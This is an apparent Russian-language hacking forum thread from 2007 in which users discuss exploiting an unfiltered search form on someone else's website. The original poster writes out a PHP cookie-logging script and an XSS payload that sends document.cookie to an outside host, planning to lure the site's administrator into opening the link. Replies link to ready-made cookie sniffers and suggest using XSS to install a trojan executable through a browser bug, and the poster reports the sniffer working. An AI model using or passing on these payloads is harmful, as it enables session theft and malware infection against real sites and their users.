xss. - другие варианты использования... |
14.02.2007, 01:35
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 78
С нами:
10137280
Репутация:
109
|
|
xss. - другие варианты использования...
День добрый.
Наткнулся недавно на одном сайте на форму, в которой вообще не идет фильтрация. Т.е. <script>alert()</script> проходит. Причем сначала пытался замаскировать скрипт, но потом выяснил, что все и так проходит.
Это форма поиска, движок самописный, на полноценном хосте.
Отсюда вопрос- что с такой формы можно поиметь? Насколько я понял из статей, можно вставить ссылку на сниффер и кинуть админу, тем самым подтибрив его куки. Но этот способ не самый подходящий, т.к. цель- рут/бд, а не админка на сайте.
Если куки- единственный вариант, то как все-таки зарегить снифер на античате? Прохожу процесс регистрации, но там сказано- если вводили пароль, то придется ввести его и при входе в сниффер. Но на деле пароль и логин не спрашиваются.
Пробовал также сделать собственный сниффер.
Код:
<?php> $query = $_SERVER['QUERY_STRING'];
$query .= "\n";
$db="cookies.txt";
$fh=fopen ($db, "a+");
fputs ($fh, "$query");
?>
Вставлял ссылку
http://***.ru/***<script>document.location.replace('http://***2.ru/sniff.php?com='+document.cookie);</script>
Соотвественно, выложил на бесплатный хост jino-net.ru, создал файл cookies.txt, установил права на запись. Но все равно не пашет, размер файла не меняется с 0 кб.
Все таки, интересуют другие варианты использования XSS, но в инете вылезеют десятки однотипных статей по куки.
Буду признателен за помошь. |
|
|
14.02.2007, 03:16
|
|
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами:
10130311
Репутация:
183
|
|
Вот хороший сниффер.
_http://kanick.ru/sniffer/public.rar
_http://kanick.ru/sniffer/personal.rar
Можно еще с помощью XSS загрузит на комп жертвы "трой" *.exe (ну или другой исполняемый файл)
Смотри видео Zadoxlikа _http://video.antichat.ru/file46.html
|
|
|
|
14.02.2007, 18:19
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 78
С нами:
10137280
Репутация:
109
|
|
Пасиб, посмотрел. Баг ИЕ с загрузкой файла уже не работает, естественно, но идея хорошая. Можно попробовать другой сплоит засунуть.
Этот сниффер тоже не пашет(( заливаю на jino-net.ru, выставляю нужные права- все равно "ошибка 500". А другой хост придется ждать, пока зарегестируют, мой на h15 похерили уже((
|
|
|
|
14.02.2007, 22:22
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
Тебе кто сказал, что он не работает, знаешь скока народу на ИЕ 6 до сих пор сидит, так что ещё как работает
|
|
|
|
14.02.2007, 22:36
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 78
С нами:
10137280
Репутация:
109
|
|
На своей машине проверил, ИЕ 6 меня послал. Правда заплатки стоят все. Админ просто большой фанат ИЕ, у него точно заплатки, мб даже ИЕ 7 стоит.
Сниффер заработал кста. Там файл .htacces вызывал ошибку 500 по неясной причине. На себе пока проверяю работу))
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
